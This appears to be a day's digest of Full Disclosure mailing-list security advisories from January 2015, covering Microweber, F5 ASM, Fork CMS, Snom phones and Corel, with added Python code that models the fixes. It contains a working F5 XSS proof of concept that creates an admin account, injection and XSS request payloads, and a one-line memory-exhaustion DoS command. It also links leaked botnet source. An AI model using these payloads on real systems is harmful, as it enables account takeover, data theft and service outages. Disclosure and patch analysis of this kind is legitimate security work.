[FD] MS14-080 CVE-2014-6365 Technical Details Without "Nonsense"

2015-01-12 Thread Diéyǔ

Origin:
Visit https://technet.microsoft.com/library/security/ms14-080
Go to "Acknowledgments" part and search for "CVE-2014-6365"
It says "Dieyu" - that's me.

Technical Details:
"Internet Explorer XSS Filter Bypass Vulnerability" is done by...
1. Inject "a href" link into target page.
(Not script, allowed by filter)
2. User clicks this injected link.
(Clickjacking etc)
3. URL of this injected link puts script into page.
(Filter does not kill it)
(Because it's a transaction within the same domain)

Social Activities:
1. Greetings
David Ross "dross".
2. Hey, if you love my hacking, please reply "nice".
(I do this for free. Love to hear from my readers.)
3. My LinkedIn page: https://www.linkedin.com/in/liuzhiyong
(You can add me there! Recently I took a new name.)
4. My ultimate "flaw": http://dieyu.org/
(You know my style. Comment is welcome!)

Regards,

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] SQL Injection Vulnerability in Microweber 0.95

2015-01-12 Thread ITAS Team
# Exploit Title: SQL Injection Vulnerability in Microweber 0.95
# Vendor: https://microweber.com/
# Download link: https://microweber.com/download (https://github.com/microweber/microweber)
# CVE ID: CVE-2014-9464
# Vulnerability: SQL Injection
# Affected version: Version 0.95 before 12/09/2014.
# Fixed version: Version 0.95 updated on 12/11/2014
# Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn)


::VULNERABILITY DETAIL::

- A SQL injection vulnerability has been found and confirmed within the Microweber CMS as an anonymous user. A successful attack could allow an anonymous attacker to access information such as usernames and password hashes, or other private information that is stored in the database. The following URL and parameter have been confirmed to suffer from SQL injection.


- Attack vector:

GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive


- Vulnerable file: microweber-master/src/Microweber/Category.php
- Vulnerable function: get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
- Vulnerable parameter: $parent_id

- Vulnerable code:

public function get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
{
    $categories_id = intval($parent_id);
    $cache_group = 'categories/' . $categories_id;

    $table = $this->tables['categories'];
    $db_t_content = $this->tables['content'];

    if (isset($orderby) == false) {
        $orderby = array();
        //$orderby[0] = 'updated_on';
        //$orderby[1] = 'DESC';
        $orderby[0] = 'position';
        $orderby[1] = 'asc';
    }

    if (intval($parent_id) == 0) {
        return false;
    }

    $data = array();
    $data['parent_id'] = $parent_id;

    if ($type != FALSE) {
        $data['data_type'] = $type;
    } else {
        $type = 'category_item';
        $data['data_type'] = $type;
    }

    // Only the integer-coerced copy ($categories_id) is safe; the raw
    // $parent_id from the request is what gets interpolated into $q below.
    $cache_group = 'categories/' . $parent_id;
    $q = " SELECT id,  parent_id FROM $table WHERE parent_id=$parent_id ";

    $q_cache_id = __FUNCTION__ . crc32($q);
    $save = $this->app->db->query($q, $q_cache_id, $cache_group);
    if (empty($save)) {
        return false;
    }

    $to_return = array();
    if (is_array($save) and !empty($save)) {
        foreach ($save as $item) {
            $to_return[] = $item['id'];
        }
    }

    $to_return = array_unique($to_return);

    return $to_return;
}


- Fix code:

public function get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
{
    // Fix: coerce the request value to an integer once, so the cache key
    // and the SQL below can only ever see digits.
    $categories_id = $parent_id = intval($parent_id);
    $cache_group = 'categories/' . $categories_id;
    $table = $this->tables['categories'];
    $db_t_content = $this->tables['content'];

    if (isset($orderby) == false) {
        $orderby = array();
        //$orderby[0] = 'updated_on';
        //$orderby[1] = 'DESC';
        $orderby[0] = 'position';
        $orderby[1] = 'asc';
    }

    if (intval($parent_id) == 0) {
        return false;
    }

    $data = array();
    $data['parent_id'] = $parent_id;

    if ($type != FALSE) {
        $data['data_type'] = $type;
    } else {
        $type = 'category_item';
        $data['data_type'] = $type;
    }

    $cache_group = 'categories/' . $parent_id;
    $q = " SELECT id, parent_id FROM $table WHERE parent_id=$parent_id ";
    $q_cache_id = __FUNCTION__ . crc32($q);
    $save = $this->app->db->query($q, $q_cache_id, $cache_group);

    if (empty($save)) {
        return false;
    }

    $to_return = array();
    if (is_array($save) and !empty($save)) {
        foreach ($save as $item) {
            $to_return[] = $item['id'];
        }
    }

    $to_return = array_unique($to_return);

    return $to_return;
}


::SOLUTION::

Version 0.95 updated on 12/11/2014
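The vulnerable and patched query construction from get_children(), modelled as an added example (not Microweber's code) against an in-memory SQLite table, plus a log check for the /shop/category: route; the table rows and the access-log lines are constructed.

```python
"""Model of the get_children() injection (CVE-2014-9464) and its intval() fix.

Added example, not Microweber's code: the schema, sample rows and access-log
lines below are constructed so the behaviour can be observed offline.
"""
import re
import sqlite3
from typing import List, Optional, Tuple
from urllib.parse import unquote

# PHP's intval() on a string takes the leading (optionally signed) integer, else 0.
_INT_PREFIX = re.compile(r"^\s*([+-]?\d+)")


def php_intval(value: str) -> int:
    """Approximate PHP intval() for string input."""
    m = _INT_PREFIX.match(value)
    return int(m.group(1)) if m else 0


def children_query(parent_id: str, fixed: bool) -> Optional[str]:
    """Return the SQL the PHP method would issue, or None where it returns false.

    fixed=False mirrors the vulnerable code: $categories_id = intval($parent_id)
    is computed, but the raw $parent_id is what gets interpolated into $q.
    fixed=True mirrors the patch, $categories_id = $parent_id = intval($parent_id),
    so only an integer can reach the query.
    """
    if php_intval(parent_id) == 0:      # both versions: if (intval($parent_id) == 0) return false
        return None
    if fixed:
        parent_id = str(php_intval(parent_id))
    return f"SELECT id, parent_id FROM categories WHERE parent_id={parent_id}"


# Constructed category tree: (id, parent_id)
SAMPLE_ROWS = [(1, 0), (2, 1), (3, 1), (4, 2), (5, 2)]


def run_children(parent_id: str, fixed: bool) -> List[int]:
    """Execute the generated query against the sample table and return child ids."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, parent_id INTEGER)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)", SAMPLE_ROWS)
    q = children_query(parent_id, fixed)
    if q is None:
        return []
    return sorted(row[0] for row in conn.execute(q))


# Detection side: the route is /shop/category:<id>, so anything but digits in
# that segment is worth a look in the access log.
_CATEGORY_SEGMENT = re.compile(r"/shop/category:([^/\s?]*)")


def flag_category_requests(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, decoded_value) for category ids that are not plain integers."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = _CATEGORY_SEGMENT.search(line)
        if m:
            value = unquote(m.group(1))
            if not value.isdigit():
                hits.append((n, value))
    return hits


# Constructed access-log excerpt (request lines only)
SAMPLE_LOG = [
    "GET /shop/category:1 HTTP/1.1",
    "GET /shop/category:1%20OR%201%3D1 HTTP/1.1",
    "GET /shop HTTP/1.1",
]

if __name__ == "__main__":
    print(run_children("1", fixed=False))          # children of category 1 only
    print(run_children("1 OR 1=1", fixed=False))   # every row: the raw value is executed
    print(run_children("1 OR 1=1", fixed=True))    # intval() keeps just the leading 1
    print(flag_category_requests(SAMPLE_LOG))
```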

 


Re: [FD] McAfee ePolicy Orchestrator Authenticated XXE and Credential Exposure

2015-01-12 Thread Tim

Hi Brandon,

> I always assume if I have
> found a vulnerability, someone else has found it as well. 

Yes, you should.  For those out there who don't routinely find
vulnerabilities, it is hard for them to understand that these issues
aren't hard to find if you know what you're looking for.  Quite a few
bugs I've found in the past have been found by others independently
and published before I got around to it.  It happens a LOT more than
people think.


Also, I think companies that sell security software should be held to
a higher standard when it comes to fixing bugs.  What's the point in
buying security "solutions" if those solutions make you more
vulnerable?   If they currently can't turn around fixes for
vulnerabilities quickly, then they can:

A. Invest more in their release cycle so new releases can be put out
much more quickly.

B. Invest more in up-front security testing and Q/A, so they aren't
shipping vulnerable code to begin with.

C. Do both A and B


Preventing these bugs isn't black magic.  It isn't rocket surgery.
It's just a matter of getting business leaders to care about shipping
quality code.

tim



Re: [FD] Lizard Stresser rekt

2015-01-12 Thread Julius Kivimäki
ayy lmao

//Julius Kivimäki, leader of Lizard Squad

2015-01-12 10:29 GMT+00:00 Robert Cavanaugh :

> Hi FD,
>
> I'm sure you're all sick to death of hearing about Lizard Squad and the
> skid marks they're leaving all over the place, so we'll make this brief:
> Lizard Squad has been rekt and the source code for their bots is now
> available for your viewing pleasure.
>
> https://github.com/pop-pop-ret/lizkebab
>
> 0wned by: Chippy1337, @packetprophet
>
> If you lulz'd, send BTC to 129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4
> 
>


[FD] [Corrected] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager

2015-01-12 Thread Peter Lapp
Edit: Corrected the date in the timeline from 01/12/14 to 01/12/15.



Details
=======

Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6



Summary
=======

The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be
displayed to end users when they trigger a violation. The
configuration page for the custom response contains a text input for
HTML and a "Show" button that allows the editor to preview the page.
This functionality is vulnerable to Cross Site Scripting.



Technical Details and POC
=========================

The HTML entered into the "Response Body" area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the
context of the management console whenever a user clicks the "Show"
button. The user could use XHR to bypass CSRF protections and perform
commands on behalf of anyone that clicks the "Show" button.

Scenario:

1. A restricted user (Application Security Editor role) logs into the
management console of the ASM, enters JavaScript to add a new user
(see below) into the "Response Body" input, and saves the page.

2. An admin logs on and previews the block page via the "Show" button.

3. The JS runs in the background, executes the XHR, and adds a new
admin user. The restricted user now has an admin account.

POC (Sloppy, I know):

// Loads the user-creation form, copies its hidden fields, and replays them
// in a POST, riding the session of whoever pressed "Show".
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function()
{
    if (xmlhttp.readyState == 4)
    {
        var postrequest = new XMLHttpRequest();
        var xmlForm = xmlhttp.responseXML.getElementById('myform');
        var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
        var timebeforevalue = encodeURIComponent(xmlForm.elements['_timenow_before'].value);
        var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
        var bufvaluebefore = encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
        var parameters =
            "_timenow="+timenowvalue+"&_timenow_before="+timebeforevalue+"&_bufvalue="+bufvalue+"&_bufvalue_before="+bufvaluebefore+"&_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Fuser%2Fcreate&handler_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&showObjList=shell_with_bash&showObjList_before=&hideObjList=partition_row%2Cshell_no_bash&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreate&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&linked_add_id=&linked_add_id_before=&exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&exit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&user_role_before=900&user_role_before_before=900&form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&name=testadmin&name_before=&name_validation=NO_VALIDATION&name_required=1&passwd=testing123&passw" +
            "d_before=&passwd_validation=com.f5.form.PasswordValidator&passwd_validationparam1=passwd_confirm&passwd_required=1&passwd_confirm=testing123&passwd_confirm_before=&passwd_confirm_validation=NO_VALIDATION&passwd_confirm_required=1&user_role=0&user_role_before=900&shell_with_bash=bash&shell_with_bash_before=disable&exit_button_before=Cancel&repeat_before=Repeat&finished=Finished&finished_before=Finished";
        postrequest.open("POST", "/tmui/Control/form", true);
        postrequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        postrequest.send(parameters);
    }
};
xmlhttp.open("GET", "/tmui/Control/jspmap/tmui/system/user/create.jsp", true);
xmlhttp.responseType = "document";
xmlhttp.send();




Solution
========

Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.


Timeline
========
06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL was not created and the fix would not be backported.
01/12/15 - Released vulnerability info.


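The fix pattern for the preview bug above, as an added example that is not F5's code: render untrusted block-page HTML in a sandboxed frame (or under a CSP sandbox header) so that script in it cannot act in the management console's origin; the payload and the /admin path are constructed.

```python
"""Previewing editor-supplied HTML without giving it the console's origin.

Added example, not F5's code.  The ASM issue is that the "Response Body" HTML
is rendered in the management console itself, so script in it runs with the
admin's session and can POST to the console.  Two standard fixes are shown: a
sandboxed iframe with an entity-encoded srcdoc, and a CSP "sandbox" header on
a raw preview endpoint.  The payload below is constructed for the demonstration.
"""
from html import escape
from typing import Dict, Tuple


def preview_page_naive(untrusted_html: str) -> str:
    """The mistake: inline the HTML straight into the console page."""
    return "<!doctype html><title>Block page preview</title><div>" + untrusted_html + "</div>"


def preview_page(untrusted_html: str) -> str:
    """Render the HTML inside an iframe with an empty sandbox attribute.

    sandbox="" grants nothing: no scripts, and an opaque origin, so even a
    script that somehow ran could not reach the console's cookies or issue a
    same-origin XHR.  srcdoc is an attribute value, so the HTML must be
    entity-encoded or the payload could close the quote and escape the frame.
    """
    return (
        "<!doctype html><title>Block page preview</title>"
        '<iframe sandbox="" referrerpolicy="no-referrer" '
        f'srcdoc="{escape(untrusted_html, quote=True)}"></iframe>'
    )


def raw_preview_response(untrusted_html: str) -> Tuple[Dict[str, str], bytes]:
    """Alternative: serve the body as its own document under a CSP sandbox.

    The "sandbox" directive puts the document in an opaque origin and the
    empty default-src blocks script and subresources; inline styles and data:
    images stay allowed because a block page legitimately uses them.
    """
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "sandbox; default-src 'none'; style-src 'unsafe-inline'; img-src data:",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, untrusted_html.encode("utf-8")


# Constructed payload of the shape described in the advisory: script that
# would POST to the console while the admin is logged in.
PAYLOAD = '<p>Blocked</p><script>new XMLHttpRequest().open("POST", "/admin", true)</script>'

if __name__ == "__main__":
    print(preview_page_naive(PAYLOAD))   # script tag survives intact
    print(preview_page(PAYLOAD))         # script tag is inert text inside srcdoc
    print(raw_preview_response(PAYLOAD)[0]["Content-Security-Policy"])
```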

Re: [FD] Snom SIP phones denial of service through HTTP

2015-01-12 Thread Martin Schuhmacher
Hi

I just did

$ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
Response: Unauthorized request

Did I miss anything?

Firmware: snom360-SIP 8.7.4.8
not downloadable any more for some reason?

Yours
Martin



[FD] Lizard Stresser rekt

2015-01-12 Thread Robert Cavanaugh
Hi FD,

I'm sure you're all sick to death of hearing about Lizard Squad and the
skid marks they're leaving all over the place, so we'll make this brief:
Lizard Squad has been rekt and the source code for their bots is now
available for your viewing pleasure.

https://github.com/pop-pop-ret/lizkebab

0wned by: Chippy1337, @packetprophet

If you lulz'd, send BTC to 129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4





[FD] Snom SIP phones denial of service through HTTP

2015-01-12 Thread kape...@googlemail.com
Snom SIP phones (www.snom.com) have a builtin HTTP/HTTPS configuration
interface, which is enabled by default.

By making a single HTTP POST request all available memory (and CPU) can be
exhausted, resulting in a reboot of the phone.
This even works if the HTTP/HTTPS interface is protected by username and
password (probably the credentials are checked a few more lines later when
the complete request has been received).

Affected models: MP, 3XX, 7XX, 8XX (I didn't have any of the other models to test)
Affected firmwares: latest stable, latest beta (most likely some others too)
Workaround: Disable HTTP/HTTPS interface completely.

PoC:

dd if=/dev/zero bs=1M count=32 | curl http://IP_OF_PHONE --data-binary @-

P.S. Just in case you are wondering: I did not notify the vendor about this. Almost two years ago I reported multiple vulnerabilities directly to the vendor (including the possibility to install arbitrary software on the device), but not much has changed since then.


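The ordering problem the post describes (body buffered first, credentials checked later), as an added example not taken from Snom firmware: a request is admitted or rejected from its headers before any body byte is read, and whatever body is read is capped; the limit and the sample requests are constructed.

```python
"""Header-only admission control for a small embedded HTTP interface.

Added example, not Snom firmware code.  The post's diagnosis is that the phone
buffers the whole POST body first and checks credentials only afterwards, so
an oversized body exhausts memory before authentication matters.  The pattern
below decides from the request headers alone, before any body byte is read,
and caps what it does read.  The limit and sample requests are constructed.
"""
import io
from typing import BinaryIO, Mapping, Optional, Tuple

MAX_BODY_BYTES = 64 * 1024   # a configuration POST is a few KB; constructed limit


def _header(headers: Mapping[str, str], name: str) -> str:
    """Case-insensitive header lookup; '' when absent."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v.strip()
    return ""


def admit(headers: Mapping[str, str], authenticated: bool,
          max_body: int = MAX_BODY_BYTES) -> Tuple[int, bool]:
    """Return (status, read_body) using headers only.

    authenticated is the outcome of checking the Authorization header or
    session cookie; that check, too, must happen before the body is read.
    read_body is True only for a request that may be consumed further.
    """
    if not authenticated:
        return 401, False                  # reject before allocating anything for the body
    if "chunked" in _header(headers, "transfer-encoding").lower():
        return 411, False                  # unknown length: refuse rather than buffer blindly
    try:
        length = int(_header(headers, "content-length") or "0")
    except ValueError:
        return 400, False
    if length < 0:
        return 400, False
    if length > max_body:
        return 413, False                  # too large: say so without reading it
    return 200, True


def read_body(stream: BinaryIO, declared_length: int,
              max_body: int = MAX_BODY_BYTES) -> Optional[bytes]:
    """Read up to declared_length bytes in small chunks; None if over the cap.

    Reading in bounded chunks and never past Content-Length means a peer that
    exceeds its declared length cannot make the buffer grow past max_body.
    """
    if declared_length > max_body:
        return None
    buf = bytearray()
    remaining = declared_length
    while remaining > 0:
        chunk = stream.read(min(4096, remaining))
        if not chunk:
            break                          # peer closed early; return the partial body
        buf += chunk
        remaining -= len(chunk)
    return bytes(buf)


def handle(headers: Mapping[str, str], authenticated: bool, body: bytes) -> Tuple[int, int]:
    """Drive admit() then read_body() over an in-memory stream; return (status, bytes_read)."""
    status, ok = admit(headers, authenticated)
    if not ok:
        return status, 0                   # the body was never touched
    data = read_body(io.BytesIO(body), int(_header(headers, "content-length") or "0"))
    return status, len(data or b"")


if __name__ == "__main__":
    huge = {"Content-Length": str(32 * 1024 * 1024)}   # the 32 MB body from the PoC
    print(handle(huge, authenticated=False, body=b""))  # 401 before any read
    print(handle(huge, authenticated=True, body=b""))   # 413 before any read
    print(handle({"Content-Length": "512"}, authenticated=True, body=b"a" * 600))
```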

[FD] XSS Vulnerability in Fork CMS 3.8.3

2015-01-12 Thread ITAS Team
# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3
# Google Dork: N/A
# Date: 12/26/2014
# Exploit Author: Le Ngoc Phi (phi.n...@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: http://www.fork-cms.com
# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released
# Version: Fork 3.8.3
# Tested on: N/A
# CVE : CVE-2014-9470


::VULNERABILITY DETAIL::

- Vulnerable parameter: q_widget
- Vulnerable file: src/Frontend/Modules/Search/Actions/Index.php
- Vulnerable function: loadForm()

- Attack vector:

GET /en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search HTTP/1.1
Host: forkcms.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; __utma=23748525.1232410121.1415937482.1419392332.1419480017.3; __utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482; PHPSESSID=gailpg881ubvtsmroh2p1bfqn5
Connection: keep-alive


- Vulnerable code:

private function loadForm()
{
    // create form
    $this->frm = new FrontendForm('search', null, 'get', null, false);

    // could also have been submitted by our widget
    if (!\SpoonFilter::getGetValue('q', null, '')) {
        $_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');
    }

    // create elements
    $this->frm->addText(
        'q',
        null,
        255,
        'inputText liveSuggest autoComplete',
        'inputTextError liveSuggest autoComplete'
    );

    // since we know the term just here we should set the canonical url here
    $canonicalUrl = SITE_URL . FrontendNavigation::getURLForBlock('Search');
    if (isset($_GET['q']) && $_GET['q'] != '') {
        // the raw q (or q_widget) value is appended without encoding and
        // reaches the page's canonical URL output: the injection point above
        $canonicalUrl .= '?q=' . $_GET['q'];
    }
    $this->header->setCanonicalUrl($canonicalUrl);
}


::DISCLOSURE::

- 12/25/2014: Detected vulnerability
- 12/25/2014: Informed vendor and the vendor confirmed
- 12/26/2014: Vendor releases patch
- 12/26/2014: ITAS Team publishes information


::REFERENCE::

- http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerability-in-fork-cms-70.html
- https://github.com/forkcms/forkcms/issues/1018s
- https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d872114


::DISCLAIMER::

THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE
USER'S OWN RISK.

ITAS Team
ITAS Corp. - Be protected with us
Office: 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.
Tel: +84 - 8 - 38931952   Hotline: 0903445711
Email: i...@itas.vn
www.itas.vn



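The loadForm() flow above, as an added example (not Fork CMS's code): the q_widget fallback, followed by the canonical URL built once as the vulnerable concatenation and once with percent-encoding for the URL and entity-encoding for the href attribute; SITE_URL and the search block URL are constructed stand-ins.

```python
"""Building the search canonical URL with the right encoding for each context.

Added example, not Fork CMS's code.  loadForm() copies q_widget into $_GET['q']
and appends it raw to the canonical URL; a value like the one in the request
above then lands inside an href attribute and breaks out of it.  Below, the
same step is done twice: once as the vulnerable concatenation and once with
percent-encoding for the URL plus entity-encoding for the attribute.
SITE_URL and SEARCH_BLOCK_URL are constructed stand-ins.
"""
from html import escape
from typing import Dict, List
from urllib.parse import parse_qs, urlencode

SITE_URL = "https://forkcms.local"        # constructed, stands in for Fork's SITE_URL
SEARCH_BLOCK_URL = "/en/search"           # constructed value for getURLForBlock('Search')


def search_term(query: Dict[str, List[str]]) -> str:
    """Mirror loadForm(): use q, or fall back to q_widget when q is empty."""
    q = query.get("q", [""])[0]
    return q if q else query.get("q_widget", [""])[0]


def term_from_query_string(query_string: str) -> str:
    """Parse a raw query string the way PHP fills $_GET, then apply the fallback."""
    return search_term(parse_qs(query_string))


def canonical_link_vulnerable(term: str) -> str:
    """Raw concatenation, as in the vulnerable code."""
    url = SITE_URL + SEARCH_BLOCK_URL
    if term != "":
        url += "?q=" + term
    return '<link rel="canonical" href="' + url + '">'


def canonical_link_fixed(term: str) -> str:
    """Encode for each context the value passes through.

    urlencode() percent-encodes quotes, '=' and parentheses so the term cannot
    add parameters or break the URL; escape() then entity-encodes the whole
    URL for the HTML attribute, so no quote can terminate href early.
    """
    url = SITE_URL + SEARCH_BLOCK_URL
    if term != "":
        url += "?" + urlencode({"q": term})
    return '<link rel="canonical" href="' + escape(url, quote=True) + '">'


# The query string from the advisory's request line, exactly as posted (unencoded).
ATTACK_QUERY = "form=search&q_widget=\"onmouseover=\"alert('XSS')\"&submit=Search"

if __name__ == "__main__":
    term = term_from_query_string(ATTACK_QUERY)
    print(canonical_link_vulnerable(term))   # the payload's quotes end href early
    print(canonical_link_fixed(term))        # one well-formed attribute, payload inert
```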

[FD] Corel Software DLL Hijacking

2015-01-12 Thread CORE Security Technologies Advisories-team (jrv)
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Corel Software DLL Hijacking



1. *Advisory Information*

Title: Corel Software DLL Hijacking
Advisory ID: CORE-2015-0001
Advisory URL:
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
Date published: 2015-01-12
Date of last update: 2015-01-06
Vendors contacted: Corel
Release mode: User release



2. *Vulnerability Information*

Class: Uncontrolled Search Path Element [CWE-427]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8393, CVE-2014-8394, CVE-2014-8395, CVE-2014-8396,
CVE-2014-8397, CVE-2014-8398



3. *Vulnerability Description*


Corel [1] has developed a wide range of products that includes graphics, painting, photo, video and office software (CorelDRAW, Corel Photo-Paint, Corel PaintShop Pro, Corel CAD, Corel Painter, Corel PDF Fusion, Corel VideoStudio and Corel FastFlick, among others).

When a file associated with the Corel software is opened, the directory of that document is first used to locate DLLs, which could allow an attacker to execute arbitrary commands by inserting malicious DLLs into the same directory as the document.



4. *Vulnerable packages*

   . Corel DRAW X7 [2]
   . Corel Photo-Paint X7 [3]
   . Corel PaintShop Pro X7 [7]
   . Corel CAD 2014 [4]
   . Corel Painter 2015 [5]
   . Corel PDF Fusion [6]
   . Corel VideoStudio PRO X7 [8]
   . Corel FastFlick [9]

Other versions could be affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*


Given that this is a client-side vulnerability, affected users should avoid opening untrusted files whose extensions are associated with Corel software and contain any of the DLL files detailed below.


6. *Credits*


This vulnerability was discovered and researched by Marcos Accossatto from Core Security Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.



7. *Technical Description / Proof of Concept Code*

[CVE-2014-8393] This vulnerability is caused by a DLL Hijacking when a file associated with any of the following Corel applications is executed (CorelDRAW X7, Corel Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter 2015 or Corel PDF Fusion). The affected application should not be running for the vulnerability to work. The Corel software looks for a DLL file called "wintab32.dll" and does not control its path, therefore allowing an attacker to copy a malicious DLL file with the same name inside the folder where the associated file is. The DLL is executed within the context of the application.

[CVE-2014-8394] This vulnerability is caused by a DLL Hijacking when a file associated with Corel CAD 2014 is executed. Corel CAD 2014 should not be running before the associated file is executed for the vulnerability to work. Corel CAD looks for a DLL file called "FxManagedCommands_3.08_9.tx" or "TD_Mgd_3.08_9.dll" and does not control their path, therefore allowing an attacker to copy a malicious DLL file with the same name as either DLL inside the folder where the associated file is. The DLL is executed within the context of the application.

[CVE-2014-8395] This vulnerability is caused by a DLL Hijacking when a file associated with Corel Painter 2015 is executed. Corel Painter 2015 should not be running before the associated file is executed for the vulnerability to work. Corel Painter looks for a DLL file called "wacommt.dll" and does not control its path, therefore allowing an attacker to copy a malicious DLL file with the same name inside the folder where the associated file is. The DLL is executed within the context of the application.

[CVE-2014-8396] This vulnerability is caused by a DLL Hijacking when a file associated with Corel PDF Fusion is executed. Corel PDF Fusion should not be running before the associated file is executed for the vulnerability to work. Corel PDF Fusion looks for a DLL file called "quserex.dll" and does not control its path, therefore allowing an attacker to copy a malicious DLL file with the same name inside the folder where the associated file is. The DLL is executed within the context of the application.

[CVE-2014-8397] This vulnerability is caused by a DLL Hijacking when a file associated with Corel VideoStudio PRO X7 or Corel FastFlick is executed. Corel Video Studio or Corel FastFlick should not be running before the associated file is executed for the vulnerability to work. Corel PDF Fusion looks for a DLL file called "u32ZLib.dll" and does not control its path, therefore allowing an attacker to copy a malicious DLL file with the same name inside the folder where the associated file is. The DLL is executed within the context of

[FD] Corel Software DLL Hijacking

2015-01-12 Thread CORE Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Corel Software DLL Hijacking



1. *Advisory Information*

Title: Corel Software DLL Hijacking
Advisory ID: CORE-2015-0001
Advisory URL:
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
Date published: 2015-01-12
Date of last update: 2015-01-06
Vendors contacted: Corel
Release mode: User release



2. *Vulnerability Information*

Class: Uncontrolled Search Path Element [CWE-427]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8393, CVE-2014-8394, CVE-2014-8395, CVE-2014-8396,
CVE-2014-8397, CVE-2014-8398



3. *Vulnerability Description*


Corel [1] has developed a wide range of products that includes graphics, painting, photo, video and office software (CorelDRAW, Corel Photo-Paint, Corel PaintShop Pro, Corel CAD, Corel Painter, Corel PDF Fusion, Corel VideoStudio and Corel FastFlick, among others).

When a file associated with the Corel software is opened, the directory of that document is first used to locate DLLs, which could allow an attacker to execute arbitrary commands by inserting malicious DLLs into the same directory as the document.


4. *Vulnerable packages*

   . Corel DRAW X7 [2]
   . Corel Photo-Paint X7 [3]
   . Corel PaintShop Pro X7 [7]
   . Corel CAD 2014 [4]
   . Corel Painter 2015 [5]
   . Corel PDF Fusion [6]
   . Corel VideoStudio PRO X7 [8]
